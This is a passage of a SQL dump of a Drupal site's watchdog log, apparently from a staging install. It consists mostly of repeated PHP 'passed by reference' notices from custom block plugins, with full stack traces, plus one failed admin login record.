/var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(357): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#9 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(216): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->block_footer(Array, Array)\n#10 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(98): Twig\\Template->displayBlock(\'footer\', Array, Array)\n#11 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->doDisplay(Array, Array)\n#12 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#13 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#14 /var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#15 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#16 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'page\', Array)\n#17 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#18 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#19 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_html.html.twig_cjUHFHRJkpWCXgLoPgc5zGUoc/c49o6mnFasdsRxPH5Y6XYvTtxG38ptuI50UyROKfTlk.php(102): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#20 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_9650c7423b11bd4e2baf76031247c420951f1e9778d2e3424fee15124d6da689->doDisplay(Array, Array)\n#21 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#22 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#23 /var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#24 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#25 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'html\', Array)\n#26 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#27 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(147): Drupal\\Core\\Render\\Renderer->render(Array)\n#28 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(582): Drupal\\Core\\Render\\MainContent\\HtmlRenderer->Drupal\\Core\\Render\\MainContent\\{closure}()\n#29 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(148): Drupal\\Core\\Render\\Renderer->executeInRenderContext(Object(Drupal\\Core\\Render\\RenderContext), Object(Closure))\n#30 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/MainContentViewSubscriber.php(90): Drupal\\Core\\Render\\MainContent\\HtmlRenderer->renderResponse(Array, Object(Symfony\\Component\\HttpFoundation\\Request), Object(Drupal\\Core\\Routing\\CurrentRouteMatch))\n#31 [internal function]: Drupal\\Core\\EventSubscriber\\MainContentViewSubscriber->onViewRenderArray(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#32 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Component/EventDispatcher/ContainerAwareEventDispatcher.php(111): call_user_func(Array, Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#33 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(156): Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher->dispatch(\'kernel.view\', Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent))\n#34 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(68): Symfony\\Component\\HttpKernel\\HttpKernel->handleRaw(Object(Symfony\\Component\\HttpFoundation\\Request), 1)\n#35 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/Session.php(57): Symfony\\Component\\HttpKernel\\HttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#36 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/KernelPreHandle.php(47): Drupal\\Core\\StackMiddleware\\Session->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#37 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(106): Drupal\\Core\\StackMiddleware\\KernelPreHandle->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#38 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(85): Drupal\\page_cache\\StackMiddleware\\PageCache->pass(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#39 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/ReverseProxyMiddleware.php(47): Drupal\\page_cache\\StackMiddleware\\PageCache->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#40 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/NegotiationMiddleware.php(52): Drupal\\Core\\StackMiddleware\\ReverseProxyMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#41 /var/www/html/clidentcastelo_stg/public/vendor/stack/builder/src/Stack/StackedHttpKernel.php(23): Drupal\\Core\\StackMiddleware\\NegotiationMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#42 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/DrupalKernel.php(693): Stack\\StackedHttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#43 /var/www/html/clidentcastelo_stg/public/index.php(20): Drupal\\Core\\DrupalKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request))\n#44 {main}\";}',5,'','http://clidentcastelo.pt/user/login','http://clidentcastelo.pt/user/login','5.188.62.25',1580448343),(4614,0,'php','%type: @message in %function (line %line of %file) @backtrace_string.',_binary 'a:6:{s:5:\"%type\";s:6:\"Notice\";s:8:\"@message\";O:25:\"Drupal\\Core\\Render\\Markup\":1:{s:9:\"\0*\0string\";s:44:\"Only variables should be passed by reference\";}s:9:\"%function\";s:46:\"Drupal\\support\\Plugin\\Block\\NewsBlock->build()\";s:5:\"%file\";s:93:\"/var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/NewsBlock.php\";s:5:\"%line\";i:21;s:17:\"@backtrace_string\";s:7972:\"#0 /var/www/html/clidentcastelo_stg/public/core/includes/bootstrap.inc(587): _drupal_error_handler_real(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#1 /var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/NewsBlock.php(21): _drupal_error_handler(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#2 /var/www/html/clidentcastelo_stg/public/core/modules/block/src/BlockViewBuilder.php(163): Drupal\\support\\Plugin\\Block\\NewsBlock->build()\n#3 [internal function]: Drupal\\block\\BlockViewBuilder::preRender(Array)\n#4 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(378): call_user_func(\'Drupal\\\\block\\\\Bl...\', Array)\n#5 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(450): Drupal\\Core\\Render\\Renderer->doRender(Array)\n#6 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#7 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#8 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(357): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#9 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(216): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->block_footer(Array, Array)\n#10 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(98): Twig\\Template->displayBlock(\'footer\', Array, Array)\n#11 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->doDisplay(Array, Array)\n#12 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#13 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#14 /var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#15 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#16 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'page\', Array)\n#17 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#18 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#19 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_html.html.twig_cjUHFHRJkpWCXgLoPgc5zGUoc/c49o6mnFasdsRxPH5Y6XYvTtxG38ptuI50UyROKfTlk.php(102): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#20 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_9650c7423b11bd4e2baf76031247c420951f1e9778d2e3424fee15124d6da689->doDisplay(Array, Array)\n#21 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#22 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#23 /var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#24 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#25 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'html\', Array)\n#26 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#27 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(147): Drupal\\Core\\Render\\Renderer->render(Array)\n#28 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(582): Drupal\\Core\\Render\\MainContent\\HtmlRenderer->Drupal\\Core\\Render\\MainContent\\{closure}()\n#29 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(148): Drupal\\Core\\Render\\Renderer->executeInRenderContext(Object(Drupal\\Core\\Render\\RenderContext), Object(Closure))\n#30 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/MainContentViewSubscriber.php(90): Drupal\\Core\\Render\\MainContent\\HtmlRenderer->renderResponse(Array, Object(Symfony\\Component\\HttpFoundation\\Request), Object(Drupal\\Core\\Routing\\CurrentRouteMatch))\n#31 [internal function]: Drupal\\Core\\EventSubscriber\\MainContentViewSubscriber->onViewRenderArray(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#32 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Component/EventDispatcher/ContainerAwareEventDispatcher.php(111): call_user_func(Array, Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#33 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(156): Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher->dispatch(\'kernel.view\', Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent))\n#34 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(68): Symfony\\Component\\HttpKernel\\HttpKernel->handleRaw(Object(Symfony\\Component\\HttpFoundation\\Request), 1)\n#35 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/Session.php(57): Symfony\\Component\\HttpKernel\\HttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#36 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/KernelPreHandle.php(47): Drupal\\Core\\StackMiddleware\\Session->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#37 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(106): Drupal\\Core\\StackMiddleware\\KernelPreHandle->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#38 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(85): Drupal\\page_cache\\StackMiddleware\\PageCache->pass(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#39 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/ReverseProxyMiddleware.php(47): Drupal\\page_cache\\StackMiddleware\\PageCache->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#40 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/NegotiationMiddleware.php(52): Drupal\\Core\\StackMiddleware\\ReverseProxyMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#41 /var/www/html/clidentcastelo_stg/public/vendor/stack/builder/src/Stack/StackedHttpKernel.php(23): Drupal\\Core\\StackMiddleware\\NegotiationMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#42 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/DrupalKernel.php(693): Stack\\StackedHttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#43 /var/www/html/clidentcastelo_stg/public/index.php(20): Drupal\\Core\\DrupalKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request))\n#44 {main}\";}',5,'','http://clidentcastelo.pt/user/login','http://clidentcastelo.pt/user/login','5.188.62.25',1580448344),(4615,0,'user','Login attempt failed for %user.',_binary 'a:1:{s:5:\"%user\";s:5:\"admin\";}',5,'','http://clidentcastelo.pt/user/login','http://clidentcastelo.pt/user/login','5.188.62.25',1580449612),(4616,0,'php','%type: @message in %function (line %line of %file) @backtrace_string.',_binary 'a:6:{s:5:\"%type\";s:6:\"Notice\";s:8:\"@message\";O:25:\"Drupal\\Core\\Render\\Markup\":1:{s:9:\"\0*\0string\";s:44:\"Only variables should be passed by reference\";}s:9:\"%function\";s:50:\"Drupal\\support\\Plugin\\Block\\ServicesBlock->build()\";s:5:\"%file\";s:97:\"/var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/ServicesBlock.php\";s:5:\"%line\";i:21;s:17:\"@backtrace_string\";s:7980:\"#0 /var/www/html/clidentcastelo_stg/public/core/includes/bootstrap.inc(587): _drupal_error_handler_real(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#1 /var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/ServicesBlock.php(21): _drupal_error_handler(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#2 /var/www/html/clidentcastelo_stg/public/core/modules/block/src/BlockViewBuilder.php(163): Drupal\\support\\Plugin\\Block\\ServicesBlock->build()\n#3 [internal function]: Drupal\\block\\BlockViewBuilder::preRender(Array)\n#4 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(378): call_user_func(\'Drupal\\\\block\\\\Bl...\', Array)\n#5 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(450): Drupal\\Core\\Render\\Renderer->doRender(Array)\n#6 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#7 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#8 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(357): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#9 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(216): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->block_footer(Array, Array)\n#10 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(98): Twig\\Template->displayBlock(\'footer\', Array, Array)\n#11 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->doDisplay(Array, Array)\n#12 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#13 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#14 /var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#15 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#16 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'page\', Array)\n#17 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#18 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#19 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_html.html.twig_cjUHFHRJkpWCXgLoPgc5zGUoc/c49o6mnFasdsRxPH5Y6XYvTtxG38ptuI50UyROKfTlk.php(102): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#20 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_9650c7423b11bd4e2baf76031247c420951f1e9778d2e3424fee15124d6da689->doDisplay(Array, Array)\n#21 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#22 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#23 /var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#24 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#25 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'html\', Array)\n#26 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#27 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(147): Drupal\\Core\\Render\\Renderer->render(Array)\n#28 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(582): Drupal\\Core\\Render\\MainContent\\HtmlRenderer->Drupal\\Core\\Render\\MainContent\\{closure}()\n#29 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(148): Drupal\\Core\\Render\\Renderer->executeInRenderContext(Object(Drupal\\Core\\Render\\RenderContext), Object(Closure))\n#30 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/MainContentViewSubscriber.php(90): Drupal\\Core\\Render\\MainContent\\HtmlRenderer->renderResponse(Array, Object(Symfony\\Component\\HttpFoundation\\Request), Object(Drupal\\Core\\Routing\\CurrentRouteMatch))\n#31 [internal function]: Drupal\\Core\\EventSubscriber\\MainContentViewSubscriber->onViewRenderArray(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#32 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Component/EventDispatcher/ContainerAwareEventDispatcher.php(111): call_user_func(Array, Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#33 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(156): Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher->dispatch(\'kernel.view\', Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent))\n#34 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(68): Symfony\\Component\\HttpKernel\\HttpKernel->handleRaw(Object(Symfony\\Component\\HttpFoundation\\Request), 1)\n#35 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/Session.php(57): Symfony\\Component\\HttpKernel\\HttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#36 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/KernelPreHandle.php(47): Drupal\\Core\\StackMiddleware\\Session->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#37 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(106): Drupal\\Core\\StackMiddleware\\KernelPreHandle->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#38 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(85): Drupal\\page_cache\\StackMiddleware\\PageCache->pass(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#39 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/ReverseProxyMiddleware.php(47): Drupal\\page_cache\\StackMiddleware\\PageCache->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#40 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/NegotiationMiddleware.php(52): Drupal\\Core\\StackMiddleware\\ReverseProxyMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#41 /var/www/html/clidentcastelo_stg/public/vendor/stack/builder/src/Stack/StackedHttpKernel.php(23): Drupal\\Core\\StackMiddleware\\NegotiationMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#42 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/DrupalKernel.php(693): Stack\\StackedHttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#43 /var/www/html/clidentcastelo_stg/public/index.php(20): Drupal\\Core\\DrupalKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request))\n#44 {main}\";}',5,'','http://clidentcastelo.pt/user/login','http://clidentcastelo.pt/user/login','5.188.62.25',1580449612),(4617,0,'php','%type: @message in %function (line %line of %file) @backtrace_string.',_binary 'a:6:{s:5:\"%type\";s:6:\"Notice\";s:8:\"@message\";O:25:\"Drupal\\Core\\Render\\Markup\":1:{s:9:\"\0*\0string\";s:44:\"Only variables should be passed by reference\";}s:9:\"%function\";s:46:\"Drupal\\support\\Plugin\\Block\\NewsBlock->build()\";s:5:\"%file\";s:93:\"/var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/NewsBlock.php\";s:5:\"%line\";i:21;s:17:\"@backtrace_string\";s:7972:\"#0 /var/www/html/clidentcastelo_stg/public/core/includes/bootstrap.inc(587): _drupal_error_handler_real(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#1 /var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/NewsBlock.php(21): _drupal_error_handler(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#2 /var/www/html/clidentcastelo_stg/public/core/modules/block/src/BlockViewBuilder.php(163): Drupal\\support\\Plugin\\Block\\NewsBlock->build()\n#3 [internal function]: Drupal\\block\\BlockViewBuilder::preRender(Array)\n#4 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(378): call_user_func(\'Drupal\\\\block\\\\Bl...\', Array)\n#5 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(450): Drupal\\Core\\Render\\Renderer->doRender(Array)\n#6 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#7 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#8 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(357): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#9 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(216): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->block_footer(Array, Array)\n#10 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(98): Twig\\Template->displayBlock(\'footer\', Array, Array)\n#11 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->doDisplay(Array, Array)\n#12 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#13 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#14 